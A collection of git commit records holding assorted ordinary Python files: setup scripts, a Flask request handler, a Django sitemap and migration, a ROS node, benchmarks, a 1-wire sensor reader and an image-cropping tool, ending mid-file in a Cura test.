a90162a43e4e1817bd818b66e4ad6e377ab8af92 | Update the setup.py version. | setup.py | setup.py | from distutils.core import setup
import sys
requires = ['feedgenerator', 'jinja2', 'pygments']
if sys.version_info < (2,7):
requires.append('argparse')
setup(
name = "pelican",
version = '1.2',
url = 'http://hg.lolnet.org/pelican/',
author = 'Alexis Metaireau',
author_email = 'alexis@notmyidea.org',
description = "A tool to generate a static blog, with restructured text input files.",
long_description=open('README.rst').read(),
packages = ['pelican'],
package_data = {'pelican': ['themes/templates/*']},
requires = requires,
scripts = ['bin/pelican'],
classifiers = ['Development Status :: 5 - Production/Stable',
'Environment :: Console',
'License :: OSI Approved :: GNU Affero General Public License v3',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Software Development :: Libraries :: Python Modules',
],
)
| from distutils.core import setup
import sys
requires = ['feedgenerator', 'jinja2', 'pygments']
if sys.version_info < (2,7):
requires.append('argparse')
setup(
name = "pelican",
version = '1.1.1',
url = 'http://hg.lolnet.org/pelican/',
author = 'Alexis Metaireau',
author_email = 'alexis@notmyidea.org',
description = "A tool to generate a static blog, with restructured text input files.",
long_description=open('README.rst').read(),
packages = ['pelican'],
package_data = {'pelican': ['themes/templates/*']},
requires = requires,
scripts = ['bin/pelican'],
classifiers = ['Development Status :: 5 - Production/Stable',
'Environment :: Console',
'License :: OSI Approved :: GNU Affero General Public License v3',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Software Development :: Libraries :: Python Modules',
],
)
| Python | 0 |
06c67a7df4e2fd5cbc221f2a9c3f64179af91344 | Add setup.py | setup.py | setup.py | from setuptools import setup, find_packages
setup(
name='django-exadmin',
version='0.1.0',
description='New style and free plugin django admin module, UI base bootstrap2.',
author='TM (sshwsfc)',
author_email='sshwsfc@gmail.com',
url='http://github.com/sshwsfc/django-exadmin',
download_url='',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Framework :: Django',
]
)
| Python | 0.000001 | |
2c874c09e7bf35a0ea6a7a5029c9b17ec5f057af | Fix mongoengine version. | setup.py | setup.py | from setuptools import setup, find_packages
import mongonaut
LONG_DESCRIPTION = open('README.rst').read()
setup(
name='django-mongonaut',
version=mongonaut.__version__,
description="An introspective interface for Django and MongoDB",
long_description=LONG_DESCRIPTION,
classifiers=[
"Development Status :: 3 - Alpha",
"Environment :: Web Environment",
"Framework :: Django",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Programming Language :: JavaScript",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content",
"Topic :: Software Development :: Libraries :: Python Modules",
],
keywords='mongodb,django',
author=mongonaut.__author__,
author_email='pydanny@gmail.com',
url='http://github.com/pydanny/django-mongonaut',
license='MIT',
packages=find_packages(),
include_package_data=True,
install_requires=['mongoengine>=0.5.2'],
zip_safe=False,
)
| from setuptools import setup, find_packages
import mongonaut
LONG_DESCRIPTION = open('README.rst').read()
setup(
name='django-mongonaut',
version=mongonaut.__version__,
description="An introspective interface for Django and MongoDB",
long_description=LONG_DESCRIPTION,
classifiers=[
"Development Status :: 3 - Alpha",
"Environment :: Web Environment",
"Framework :: Django",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Programming Language :: JavaScript",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content",
"Topic :: Software Development :: Libraries :: Python Modules",
],
keywords='mongodb,django',
author=mongonaut.__author__,
author_email='pydanny@gmail.com',
url='http://github.com/pydanny/django-mongonaut',
license='MIT',
packages=find_packages(),
include_package_data=True,
install_requires=['mongoengine==0.5.2'],
zip_safe=False,
)
| Python | 0 |
ccbb7e11edc63a128b7006e015539fdabd8f3a7f | Set up frontend for longpolling | bitHopper/LongPoll.py | bitHopper/LongPoll.py | from gevent.event import AsyncResult
# Single shared AsyncResult; every long-poll client blocks on it in wait()
# until trigger() publishes a new work unit.
_event = AsyncResult()
def wait():
    """
    Gets the New Block work unit to send to clients
    """
    # Blocks until trigger() sets a result (this is the long-poll wait).
    return _event.get()
def trigger(work):
    """
    Call to trigger a LP

    Wakes everything blocked in wait() with `work`, then installs a fresh
    AsyncResult for the next long-poll cycle.
    """
    global _event
    old = _event              # was `self._event`: NameError in a module-level function
    _event = AsyncResult()    # was `event.AsyncResult()`: no `event` name in scope
    old.set(work)
| Python | 0 | |
34ad457ab831173efd3758af926deb17daf53feb | Add sitemap | resources/sitemaps.py | resources/sitemaps.py | from django.contrib.sitemaps import Sitemap
from resources.models import Resource
from django.utils import translation
class ResourceSitemap(Sitemap):
    """Sitemap of published, indexable resources in the active language."""
    def items(self):
        # Resources flagged noindex or unpublished are excluded; only the
        # current locale's resources appear.
        return Resource.objects.filter(noindex=False, is_published=True,
                                       language=translation.get_language())
    def lastmod(self, obj):
        # Last-modified timestamp reported to crawlers for each entry.
        return obj.modified
| Python | 0.000002 | |
67cca3176d1e2b5def3ebbd64f4bd56a8976529b | add res.company file | l10n_br_sale/res_company.py | l10n_br_sale/res_company.py | # -*- encoding: utf-8 -*-
###############################################################################
# #
# Copyright (C) 2014 Renato Lima - Akretion #
# #
#This program is free software: you can redistribute it and/or modify #
#it under the terms of the GNU Affero General Public License as published by #
#the Free Software Foundation, either version 3 of the License, or #
#(at your option) any later version. #
# #
#This program is distributed in the hope that it will be useful, #
#but WITHOUT ANY WARRANTY; without even the implied warranty of #
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
#GNU Affero General Public License for more details. #
# #
#You should have received a copy of the GNU Affero General Public License #
#along with this program. If not, see <http://www.gnu.org/licenses/>. #
###############################################################################
from openerp import models, fields
class ResCompany(models.Model):
    """Extends res.company with a default fiscal category for sale journals."""
    _inherit = 'res.company'
    # Default fiscal category; the domain restricts selection to sale-type
    # journals.  NOTE(review): the pt_BR label says 'Compras' (purchases)
    # while the domain filters sale journals -- possible copy-paste, confirm.
    sale_fiscal_category_id = fields.Many2one(
        'l10n_br_account.fiscal.category', u'Categoria Fiscal Padrão Compras',
        domain="[('journal_type', '=', 'sale')]")
| Python | 0.000001 | |
a562aa0ac58b2ee4fec3f9ff0b70a595db4c48ad | add test case for csv validation, with first test already implemented | doajtest/unit/test_reapp_csv_validate.py | doajtest/unit/test_reapp_csv_validate.py | from doajtest.helpers import DoajTestCase
from portality.clcsv import ClCsv
from portality import reapplication
from copy import deepcopy
import os
# One complete spreadsheet column of application answers, in the same order
# as reapplication.Suggestion2QuestionXwalk.question_list().  _make_valid_csv()
# below copies this list and overrides the title (index 0) and the two ISSNs
# (indexes 3 and 4) for each test column.
APPLICATION_COL = [
    "The Title",
    "http://journal.url",
    "Alternative Title",
    "1234-5678",
    "9876-5432",
    "The Publisher",
    "Society Institution",
    "Platform Host Aggregator",
    "Contact Name",
    "contact@email.com",
    "contact@email.com",
    "US",
    "Yes",
    2,
    "GBP",
    "Yes",
    4,
    "USD",
    16,
    "http://articles.last.year",
    "Yes",
    "http://waiver.policy",
    "LOCKSS, CLOCKSS, A national library, Other",
    "Trinity",
    "A safe place",
    "http://digital.archiving.policy",
    "Yes",
    "DOI, ARK, Other",
    "PURL",
    "Yes",
    "Yes",
    "http://download.stats",
    1980,
    "HTML, XML, Other",
    "Wordperfect",
    "word, key",
    "EN, FR",
    "http://editorial.board",
    "Open peer review",
    "http://review.process",
    "http://aims.scope",
    "http://author.instructions",
    "Yes",
    "http://plagiarism.screening",
    8,
    "http://oa.statement",
    "Yes",
    "http://licence.embedded",
    "Other",
    "CC MY",
    "BY, NC",
    "http://licence.url",
    "Yes",
    "Sherpa/Romeo, Other",
    "Store it",
    "Other",
    "Sometimes",
    "http://copyright",
    "Other",
    "Occasionally",
    "http://publishing.rights"
]
class TestReAppCsv(DoajTestCase):
    """Tests for reapplication CSV parsing/validation (portality.reapplication)."""
    def setUp(self):
        # Build one parseable CSV and one binary blob for each test run.
        super(TestReAppCsv, self).setUp()
        self._make_valid_csv()
        self._random_binary()
    def tearDown(self):
        # Remove the fixture files created in setUp.
        super(TestReAppCsv, self).tearDown()
        if os.path.exists("valid.csv"):
            os.remove("valid.csv")
        if os.path.exists("random_binary"):
            os.remove("random_binary")
    def _make_valid_csv(self):
        # Writes valid.csv: the question list in column 1, then three
        # application columns keyed (and headed) by their print ISSN.
        sheet = ClCsv("valid.csv")
        # first column is the questions
        qs = reapplication.Suggestion2QuestionXwalk.question_list()
        sheet.set_column("", qs)
        # add 3 columns of results for testing purposes
        c1 = deepcopy(APPLICATION_COL)
        c1[0] = "First Title"
        c1[3] = "1234-5678"
        c1[4] = "9876-5432"
        sheet.set_column(c1[3], c1)
        c2 = deepcopy(APPLICATION_COL)
        c2[0] = "Second Title"
        c2[3] = "2345-6789"
        c2[4] = "8765-4321"
        sheet.set_column(c2[3], c2)
        c3 = deepcopy(APPLICATION_COL)
        c3[0] = "Third Title"
        c3[3] = "3456-7890"
        c3[4] = "7654-3210"
        sheet.set_column(c3[3], c3)
        sheet.save()
    def _random_binary(self):
        # 1 KiB of random bytes -- guaranteed not to parse as a CSV.
        with open('random_binary', 'wb') as fout:
            fout.write(os.urandom(1024))
    def test_01_open_csv(self):
        # first try a valid csv
        sheet = reapplication.open_csv("valid.csv")
        assert sheet is not None
        headers = sheet.headers()
        assert headers == ["", "1234-5678", "2345-6789", "3456-7890"], headers
        # now try one that won't parse
        with self.assertRaises(reapplication.CsvValidationException):
            sheet = reapplication.open_csv("random_binary")
    def test_02_structure(self):
        # TODO: structural validation of the sheet (not yet implemented).
        pass
    def test_03_contents(self):
        # TODO: content validation of each column (not yet implemented).
        pass
| Python | 0 | |
df84cf964214420987c51813b8960ce068223adf | Add request handler | request_handler/request_handler.py | request_handler/request_handler.py | #!flask/bin/python
from flask import Flask, jsonify, abort
from flask import make_response
from flask import request
from flask import url_for
import psycopg2 as pg
app = Flask(__name__)
def make_public_request(request):
    """Map a (request_id, source, destination) DB row to its public JSON form.

    NOTE(review): the parameter shadows flask's `request` proxy inside this
    function; here it is a plain database row tuple.
    """
    return {
        'uri': url_for('get_requests', request_id=request[0], _external=True),
        'source': request[1],
        'destination': request[2],
    }
@app.route('/clientapp/requests', methods=['GET'])
def get_requests():
    ''' Get requests from the database
    '''
    # Opens a fresh connection per call, fetches every row, and returns the
    # public (uri/source/destination) form of each request as JSON.
    conn = pg.connect(database="ngot", host="127.0.0.1", port="5432")
    cursor = conn.cursor()
    cursor.execute("SELECT request_id, source, destination from requests")
    rows = list(cursor.fetchall())
    cursor.close()
    conn.close()
    return jsonify({'requests': [make_public_request(req) for req in rows]})
@app.route('/clientapp/vehicle_trips', methods=['GET'])
def get_vehicle_trips():
    ''' Query the database and return generated vehicle trips
    '''
    conn = pg.connect(database="ngot", host="127.0.0.1", port="5432")
    cursor = conn.cursor()
    # Register a decoder so psycopg2 returns the array type with OID 1017
    # ('PICKUP_POINTS[]') as plain strings.
    pg.extensions.register_type(
        pg.extensions.new_array_type(
            (1017,), 'PICKUP_POINTS[]', pg.STRING))
    cursor.execute("SELECT pickup_points from vehicletrips")
    # NOTE(review): fetchone() returns only the first trip row -- confirm
    # whether all rows were intended here.
    rows = cursor.fetchone()
    cursor.close()
    conn.close()
    return jsonify({'vehicle_trips': rows})
@app.route('/clientapp/requests', methods=['POST'])
def create_request():
    """Insert a new ride request; the JSON body must carry 'source' and 'destination'."""
    # Reject malformed posts with a 400 instead of crashing with a KeyError
    # (replaces the broken commented-out check that used to sit here).
    if not request.json or 'source' not in request.json or 'destination' not in request.json:
        abort(400)
    conn = pg.connect(database="ngot", host="127.0.0.1", port="5432")
    cursor = conn.cursor()
    source = request.json['source']
    destination = request.json['destination']
    # Parameterized query -- safe against SQL injection.
    cursor.execute("INSERT INTO requests (source, destination) values (%s, %s)", (source, destination))
    rows = cursor.rowcount
    conn.commit()
    cursor.close()
    conn.close()
    return jsonify({'rows': rows}), 201
@app.errorhandler(404)
def not_found(error):
    # Uniform JSON 404 body instead of flask's default HTML error page.
    return make_response(jsonify({'error': 'Not found'}), 404)
if __name__ == '__main__':
    # Listen on all interfaces; flask debug server only -- not for production.
    app.run(host='0.0.0.0', debug=True)
    #app.run(debug=True)
| Python | 0.000001 | |
4e54128e5c0b9c762e5f93ae0d8791eeddde2264 | Add JSON serializer | dxr/json.py | dxr/json.py | #!/usr/bin/env python2
class JsonOutput:
    """Incremental JSON string builder.

    Values are appended with add(); nested dicts and lists recurse through
    key_dict()/key_list().  print_str() returns the accumulated pairs wrapped
    in braces.  Note: non-container values are serialized with str(), so
    booleans come out as unquoted True/False.
    """

    def __init__(self):
        # Per-instance buffers (previously class attributes).
        self.need_separator = False
        self.content = ''

    def open(self):
        """Begin a nested object."""
        self.content += '{'
        self.need_separator = False

    def close(self):
        """End a nested object."""
        self.content += '}'
        self.need_separator = True

    def open_list(self):
        """Begin a nested array."""
        self.content += '['
        self.need_separator = False

    def close_list(self):
        """End a nested array."""
        self.content += ']'
        self.need_separator = True

    def key_value(self, key, value, quote_value):
        """Append `"key" : value`, or a bare value when key is None (list element)."""
        if self.need_separator is True:
            self.content += ','
        if key is not None:
            # BUGFIX: ' : ' used to be emitted even for key-less list
            # elements, producing output like `[ : 1, : 2]`.
            self.content += '"' + key + '"'
            self.content += ' : '
        if quote_value is True:
            self.content += '"' + value + '"'
        else:
            self.content += value
        self.need_separator = True

    def key_dict(self, key, nested_values):
        """Append a nested object, prefixed with `"key" : ` unless key is None."""
        if self.need_separator is True:
            self.content += ','
        if key is not None:
            self.content += '"' + key + '"'
            self.content += ' : '
        self.open()
        for subkey in nested_values.keys():
            self.add(subkey, nested_values[subkey])
        self.close()
        self.need_separator = True

    def key_list(self, key, values):
        """Append a nested array, prefixed with `"key" : ` unless key is None."""
        if self.need_separator is True:
            self.content += ','
        if key is not None:
            # BUGFIX: this concatenation used to run unconditionally, so a
            # list nested inside a list raised TypeError ('"' + None).
            self.content += '"' + key + '"'
            self.content += ' : '
        self.open_list()
        for subvalue in values:
            self.add(None, subvalue)
        self.close_list()
        self.need_separator = True

    def add(self, key, value):
        """Append a key/value pair, dispatching on the value's type."""
        if isinstance(value, dict):
            self.key_dict(key, value)
        elif isinstance(value, list):
            self.key_list(key, value)
        elif isinstance(value, int):
            self.key_value(key, str(value), False)
        else:
            self.key_value(key, str(value), True)

    def print_str(self):
        """Return the serialized pairs wrapped in an outer object."""
        return '{' + self.content + '}'
#if __name__ == '__main__':
# json = JsonOutput()
#
# json.add('foo', 'bar')
# json.add('age', 666)
# json.add('hash', { 'aa': 'bb', 'cc': 'dd', 'zz': [ 1, 3, 5]})
# json.add('list', [1, 2, 3])
# json.add('mixed', [ {'Foo': 'bar', 'Tu': 'ruru' }, { 'lala': 'whee', 'pi': 3 } ])
#
# print json.print_str();
| Python | 0 | |
30eec7bb18285b82a7d67a0a3d9098afc5b9e286 | Create QRfactorization.py | effective_quadratures/QRfactorization.py | effective_quadratures/QRfactorization.py | # A set of functions just for QR factorization, pivoting and iterative-QR
| Python | 0.000001 | |
324243dfd61afd8ce244a9a02ffc800c5c73ce55 | Add modified chart with better values | charts/daniels_designing_great_beers/appendix_two_course_grind_potential_extract_modified.py | charts/daniels_designing_great_beers/appendix_two_course_grind_potential_extract_modified.py |
from brew.utilities import sg_from_dry_basis
"""
Ray Daniels
Designing Great Beers
Appendix 2: Course Grind Potential Extract (modified)
Notes:
The chart appears to have been developed with the moisture content set
to zero (0.0) and the Brew House Efficiency set to 100% (1.0). This
is not typical and the book even states that you should expect moisture
content at around 4.0% and Brew House Efficiency at arount 90.0%.
This version has been modified with more typical values.
"""
def get_chart():
    """Build the coarse-grind potential-extract chart.

    Returns a list of [DBCG %, gravity units, specific gravity] rows for
    dry-basis values 50.00-75.00 in 1.00 steps and 76.00-80.00 in 0.25 steps.
    """
    mc = 4      # moisture content (%), typical per the notes above
    bhe = 0.9   # brew house efficiency, typical per the notes above
    chart = []
    # `range(...) + range(...)` only works on Python 2; wrapping each side in
    # list() yields the same sequence on both Python 2 and 3.
    for dbcg in list(range(5000, 7600, 100)) + list(range(7600, 8025, 25)):
        gu = sg_from_dry_basis(
            dbcg / 100.0,
            moisture_content=mc,
            brew_house_efficiency=bhe)
        sg = 1 + (gu / 1000.0)
        chart.append([round(dbcg / 100.0, 2), round(gu, 2), round(sg, 4)])
    return chart
def print_chart():
    """Print the chart as a tab-separated table (DBCG %, GU, SG)."""
    chart = get_chart()
    print("DBCG\tGU\t1 lb./gallon")
    print("'As-Is'\t\tYields SG")
    print("-------\t-----\t------------")
    for dbcg, gu, sg in chart:
        print("{0:0.2f}\t{1:0.2f}\t{2:0.4f}".format(dbcg, gu, sg))
def main():
    """Entry point: print the full chart."""
    print_chart()
if __name__ == "__main__":
    main()
| Python | 0 | |
7172d06ced60b2c69b9ac2762019ff95f3fd7da5 | Create twice.py | twice.py | twice.py | #!/usr/bin/env python
import rospy
from std_msgs.msg import Int32

# Last doubled value; written by the subscriber callback, re-published below.
n = 0

def cb(message):
    """Subscriber callback: remember twice the received count."""
    # rospy.loginfo(message.data*2)  # (was `//...` -- `//` is not a Python comment)
    global n
    n = message.data*2

if __name__ == '__main__':
    rospy.init_node('twice')
    sub = rospy.Subscriber('count_up', Int32, cb)
    # rospy.spin()  # not needed: the publish loop below keeps the node alive
    pub = rospy.Publisher('twice', Int32, queue_size=1)
    rate = rospy.Rate(10)
    # Publish the latest doubled value at 10 Hz until shutdown.
    while not rospy.is_shutdown():
        pub.publish(n)
        rate.sleep()
| Python | 0.000002 | |
a882409ede1898a3b4e2fb4619089b33c1427315 | Add migration | apps/conditions/migrations/0005_empty_relation.py | apps/conditions/migrations/0005_empty_relation.py | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-08-10 14:23
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Alters Condition.relation choices (list now includes 'empty'/'notempty')."""
    dependencies = [
        ('conditions', '0004_condition_title'),
    ]
    operations = [
        migrations.AlterField(
            model_name='condition',
            name='relation',
            field=models.CharField(choices=[('eq', 'is equal to (==)'), ('neq', 'is not equal to (!=)'), ('contains', 'contains'), ('gt', 'is greater than (>)'), ('gte', 'is greater than or equal (>=)'), ('lt', 'is lesser than (<)'), ('lte', 'is lesser than or equal (<=)'), ('empty', 'is empty'), ('notempty', 'is not empty')], max_length=8),
        ),
    ]
| Python | 0.000002 | |
673a6ee654d7e540fe9c473904b6d1e326928c58 | Create run_test.py | recipes/django-storages/run_test.py | recipes/django-storages/run_test.py | import django
# Minimal smoke test: configure throwaway Django settings with django-storages
# installed, boot Django, then make sure the `storages` app imports cleanly.
from django.conf import settings
settings.configure(INSTALLED_APPS=['storages', 'django.contrib.contenttypes', 'django.contrib.auth'])
django.setup()
import storages
| Python | 0.000004 | |
87de57c86b5d607b1fa795b46cefb3a722919f72 | add script for testing speed | scripts/time_quimb.py | scripts/time_quimb.py | import timeit
# Micro-benchmarks for quimb: dense matmul and dense/sparse eigensolvers.
# Each case builds its operands inside the timeit `setup` string (so only
# the measured statement is timed) and prints a padded label + total time.

def _bench(label, setup, stmt, number):
    """Run `stmt` `number` times after `setup` and print '<label>: <t> sec'."""
    t = timeit.timeit(stmt, setup=setup, number=number)
    print(label.ljust(20) + ": {:.3} sec".format(t))

# ----------------------------- dense dot ----------------------------------- #

_bench("Small dot", """
import quimb
a = quimb.rand_herm(2**4)
b = quimb.rand_herm(2**4)
""", """
a @ b
""", 100000)

_bench("Big dot", """
import quimb
a = quimb.rand_herm(2**10)
b = quimb.rand_herm(2**10)
""", """
a @ b
""", 10)

# ----------------------------- dense eigsys -------------------------------- #

_bench("Small eigsys", """
import quimb
mat = quimb.rand_herm(2**4) """, """
quimb.eigsys(mat) """, 10000)

_bench("Big eigsys", """
import quimb
mat = quimb.rand_herm(2**10) """, """
quimb.eigsys(mat) """, 10)

# ----------------------------- sparse eigsys ------------------------------- #

_bench("Scipy seigsys", """
import quimb
mat = quimb.rand_herm(2**14, sparse=True) """, """
quimb.seigsys(mat, backend='scipy') """, 10)

_bench("Slepc seigsys", """
import quimb
mat = quimb.rand_herm(2**14, sparse=True) """, """
quimb.seigsys(mat, backend='slepc') """, 10)

_bench("Scipy seigsys int", """
import quimb
import qdmbl
mat = qdmbl.ham_qd(10, 1, sparse=True) """, """
quimb.seigsys(mat, sigma=0.01, backend='scipy') """, 10)

_bench("Slepc seigsys int", """
import quimb
import qdmbl
mat = qdmbl.ham_qd(10, 1, sparse=True) """, """
quimb.seigsys(mat, sigma=1, backend='slepc') """, 10)
| Python | 0 | |
397bc67a5a214a4cad5eef20f3a13c53f90964c5 | Modify tms_nw_svr | scripts/tms_nw_svr.py | scripts/tms_nw_svr.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import rospy
import requests
from BaseHTTPServer import HTTPServer
from BaseHTTPServer import BaseHTTPRequestHandler
import urlparse
def svr_start(port, callback):
    """Run a blocking HTTP server on `port`, dispatching GET queries to `callback`.

    Never returns (serve_forever).
    """
    def handler(*args):
        # Was `CallbackServer(callback, *args)` -- no such name exists in
        # this module; the request-handler class defined below is tms_nw_svr.
        tms_nw_svr(callback, *args)
    server = HTTPServer(('', int(port)), handler)
    server.serve_forever()
class tms_nw_svr(BaseHTTPRequestHandler):
    """HTTP request handler that forwards each GET's query string to a callback."""
    def __init__(self, callback, *args):
        # Store the callback before the base __init__, which handles the
        # request synchronously (and therefore calls do_GET).
        self.callback = callback
        # Was `BaseHTTPRequestHandler.__init__(self, args)`: that passed the
        # whole tuple as one argument; the base class expects it unpacked as
        # (request, client_address, server).
        BaseHTTPRequestHandler.__init__(self, *args)
    def do_GET(self):
        parsed_path = urlparse.urlparse(self.path)
        query = parsed_path.query
        self.send_response(200)
        self.end_headers()
        # The callback must return an iterable of strings; they are joined
        # with CRLF into the response body.
        result = self.callback(query)
        message = '\r\n'.join(result)
        self.wfile.write(message)
return | Python | 0 | |
fec45cfaee6c5e5d02b6c3979179cdad153d5076 | add ds18b20 rpi implementation to examples | examples/raspberrypi/platform/ds18b20.py | examples/raspberrypi/platform/ds18b20.py | import os
import re
import subprocess
# Sysfs directory where the kernel's 1-wire subsystem exposes slave devices.
W1_DEVICES = '/sys/bus/w1/devices/'
# DS18x20-style addresses: family code 10/22/28 followed by a serial suffix.
W1_SENSOR_PATTERN = re.compile('(10|22|28)-.+', re.IGNORECASE)
def modprobe(module):
    """Load a kernel module; raises CalledProcessError if modprobe fails."""
    return subprocess.check_call(['modprobe', module])
def init_w1():
    """Load the kernel modules that expose 1-wire thermal sensors."""
    modprobe('w1-gpio')
    modprobe('w1-therm')
def is_w1_sensor(path):
    # A directory entry is a sensor if it matches the address pattern and
    # actually exposes a readable w1_slave file.
    return \
        W1_SENSOR_PATTERN.match(path) and \
        os.path.isfile(sensor_full_path(path))
def sensor_full_path(sensor):
    """Return the sysfs w1_slave path for the given sensor address."""
    return os.path.join(W1_DEVICES, sensor, 'w1_slave')
def read_whole_file(path):
    """Read and return the full contents of the text file at *path*."""
    with open(path, 'r') as source:
        contents = source.read()
    return contents
class InvalidW1Address(Exception):
    """Error raised for strings that are not valid 1-wire sensor addresses."""
    def __init__(self, address):
        self.address = address  # the rejected address, for callers to inspect
        super(InvalidW1Address, self).__init__()
def guard_against_invalid_address(address):
    """Raise InvalidW1Address unless `address` matches the 1-wire pattern."""
    if not W1_SENSOR_PATTERN.match(address):
        raise InvalidW1Address(address)
class DS18b20(object):
    """A single DS18x20 temperature sensor exposed through sysfs."""
    @staticmethod
    def find_all():
        """Return a DS18b20 for every sensor currently visible in sysfs."""
        return [DS18b20(x) for x in os.listdir(W1_DEVICES) if is_w1_sensor(x)]
    def __init__(self, address):
        # Fail fast on malformed addresses.
        guard_against_invalid_address(address)
        self.address = address
    def read(self):
        """Return the sensor reading, or None if no 't=' field is present.

        The raw w1_slave output carries the reading after a 't=' token; the
        value is divided by 1000 (the raw figure is in thousandths).
        """
        readings = read_whole_file(sensor_full_path(self.address))
        temp_token = 't='
        temp_index = readings.find(temp_token)
        if temp_index < 0:
            return None
        temp = readings[temp_index + len(temp_token):]
        return float(temp) / 1000
| Python | 0 | |
ba3643f6e2adc0c5c32134b5ec23403e97663237 | Create vFMCT.py | vFMCT.py | vFMCT.py | # -*- coding: utf-8 -*-
"""
@author: Jean-Gabriel JOLLY
"""
from tkinter import *
import PIL
from PIL import Image
import os
# Module-level state shared by the Tk event handlers below.  (The `global`
# statements that used to sit here were no-ops: `global` only has an effect
# inside a function body, so they have been dropped.)
rectangleList = []                      # canvas ids of the selection rectangles
numberImage, numberRectangle, totalRectangle = 0, 0, 0
# Square position (corners of the rectangle currently being dragged)
x1, x2, y1, y2 = 0, 0, 0, 0
# ===============
def leftClick(event):
    # Start of a drag: remember the anchor corner and show the coordinates.
    chaine.configure(text = str(event.x)+" "+str(event.y))
    global x1,y1
    x1=event.x
    y1=event.y
def holdLeftClick(event):
    # Drag in progress: stretch the rubber-band rectangle to the cursor.
    global numberRectangle
    chaine.configure(text = str(event.x)+" "+str(event.y)+"Frame object number "+str(numberRectangle))
    cadre.coords(rectangle, x1,y1,event.x,event.y)
def releaseLeftClick(event):
    # End of a drag: hide the rubber band, draw a permanent rectangle, and
    # crop/save the selected region of the source image.
    cadre.coords(rectangle, 0, 0, 0, 0)
    global x2,y2,numberRectangle,rectangleList,totalRectangle
    chaine.configure(text = "Number of frames:" + str(numberRectangle+1))
    x2=event.x
    y2=event.y
    rectangleList.append(cadre.create_rectangle(x1,y1,x2,y2))
    numberRectangle += 1
    totalRectangle += 1
    ####CROPPING PART#####
    # Canvas coordinates are on the resized preview; dividing by hpercent
    # maps them back onto the original image.
    area = (x1/hpercent, y1/hpercent, x2/hpercent, y2/hpercent)
    cropped_img = img.crop(area)
    cropped_img.save('name' + str(totalRectangle) + '.png')
    ######################
def middleClick(event):
    # NOTE(review): bumps the frame counter without keeping a rectangle
    # (one is created and immediately deleted) -- confirm this is intended.
    global numberRectangle
    numberRectangle += 1
    id1=cadre.create_rectangle(10,10,12,12)
    cadre.delete(id1)
def rightClick(event):
    # Undo: remove the most recent rectangle and its saved crop file.
    global rectangleList, numberRectangle, totalRectangle
    if numberRectangle > 0:
        chaine.configure(text = "Erasing frame number ="+str(numberRectangle))
        cadre.delete(rectangleList[len(rectangleList)-1])
        del rectangleList[len(rectangleList)-1]
        os.remove("name" + str(totalRectangle) + ".png")
        numberRectangle -= 1
        totalRectangle -= 1
    else:
        chaine.configure(text = "Nothing to erase")
fen = Tk()
fen.title('Very Fast Multiple Cropping Tool')
# NOTE(review): height is taken from winfo_screenwidth() and width from
# winfo_screenheight() -- the names appear swapped; confirm.
height=fen.winfo_screenwidth() #^\/
width=fen.winfo_screenheight() #<>
photo = PhotoImage(file="image3.png")
###DISPLAY RESIZE MODULE###
# Scale the image to fit the screen; hpercent is the preview scale factor
# also used by releaseLeftClick() to map selections back to the original.
baseheight = (fen.winfo_screenwidth()-1000) #size of the height of the screen
img = Image.open("image3.png")
hpercent = ((baseheight / float(img.size[1])))
print(hpercent)
wsize = int((float(img.size[0]) * float(hpercent)))
img2 = img.resize((wsize, baseheight), PIL.Image.ANTIALIAS)
###########################
img2.save("temporaryFile.png")
#photo2 = PhotoImage(file="image32bis.png")
photo2 = PhotoImage(file="temporaryFile.png")
cadre = Canvas(fen, width=photo2.width(), height=photo2.height(), bg="light yellow")
cadre.create_image(0, 0, anchor=NW, image=photo2) #BUG
# Mouse bindings: left drag selects a region, middle advances the frame
# counter, right click undoes the last selection.
cadre.bind("<Button-1>", leftClick)
cadre.bind("<B1-Motion>", holdLeftClick)
cadre.bind("<ButtonRelease-1>", releaseLeftClick)
cadre.bind("<Button-2>", middleClick)
# NOTE(review): trailing space inside the event string below -- confirm
# Tk parses "<ButtonRelease-3> " as intended.
cadre.bind("<ButtonRelease-3> ", rightClick)
cadre.pack()
chaine = Label(fen)
chaine.pack()
rectangle=cadre.create_rectangle(0,0,0,0)
fen.mainloop()
# After the window closes: clean up the preview file and dump final state.
os.remove("temporaryFile.png")
print(numberImage)
print(numberRectangle)
print(rectangleList)
print(height)
print(width)
| Python | 0 | |
053974bc96ef34075612495a7eb537ff691ff38e | Add test to see if legacy files are renamed | tests/Settings/TestCuraContainerRegistry.py | tests/Settings/TestCuraContainerRegistry.py | # Copyright (c) 2017 Ultimaker B.V.
# Cura is released under the terms of the AGPLv3 or higher.
import os #To find the directory with test files and find the test files.
import pytest #This module contains unit tests.
import shutil #To copy files to make a temporary file.
import unittest.mock #To mock and monkeypatch stuff.
from cura.Settings.CuraContainerRegistry import CuraContainerRegistry #The class we're testing.
from cura.Settings.ExtruderStack import ExtruderStack #Testing for returning the correct types of stacks.
from cura.Settings.GlobalStack import GlobalStack #Testing for returning the correct types of stacks.
from UM.Resources import Resources #Mocking some functions of this.
import UM.Settings.ContainerRegistry #Making empty container stacks.
import UM.Settings.ContainerStack #Setting the container registry here properly.
from UM.Settings.DefinitionContainer import DefinitionContainer #Checking against the DefinitionContainer class.
## Gives a fresh CuraContainerRegistry instance.
#  (Each test that takes this fixture gets its own registry object.)
@pytest.fixture()
def container_registry():
    return CuraContainerRegistry()
## Tests whether loading gives objects of the correct type.
#  Each parametrized case maps one on-disk stack file to the stack class
#  the registry is expected to instantiate for it.
@pytest.mark.parametrize("filename, output_class", [
